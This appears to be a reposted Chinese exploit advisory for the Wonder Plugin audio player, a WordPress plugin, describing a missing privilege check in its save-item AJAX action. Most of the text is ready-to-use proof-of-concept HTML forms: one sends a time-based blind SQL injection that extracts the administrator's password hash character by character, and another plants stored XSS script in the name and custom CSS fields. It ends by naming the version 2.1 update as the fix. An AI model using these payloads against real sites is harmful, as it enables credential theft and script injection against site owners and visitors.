wordpasss插件Wonder Plugin音频播放器

怪狗 2016-7-31 Exploit 0 0

 1.描述
  
  wp_ajax_save_item()访问每一个注册用户(管理员权限不检查)。
  
  save_item()使用is_id_exist()的$ id是正常没有逃过。
  
  2.概念验证
  
  作为标准的用户登录(使用wp-login.php创建? action =注册):
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
    <input type="text" name="item[id]" value="1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)">
    <input type="submit" value="Hack!">
</form>
个SQL将首先检查密码字符用户ID = 1是“$”。    如果是,它将睡眠5秒。    XSS使用:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
    <input type="hidden" name="item[id]" value="1">
    <input type="text" name="item[name]" value=’<script>alert(String.fromCharCode(88,83,83));</script>’>
    <input type="text" name="item[customcss]" value=’</style><script>alert(String.fromCharCode(88,83,83));</script>’>
    <input type="submit" value="Hack!">
</form>
它将显示在每一页,商家wonderplugin_audio也用于管理小组:
http://wordpress-url/wp-admin/admin.php?page=wonderplugin_audio_show_items 
解决方案:    更新到2.1版本     

 

原文地址:https://www.77169.com/exploits/2015/20150313154511.shtm

转载请注明来自华盟网,本文标题:《wordpasss插件Wonder Plugin音频播放器》

喜欢 (0) 发布评论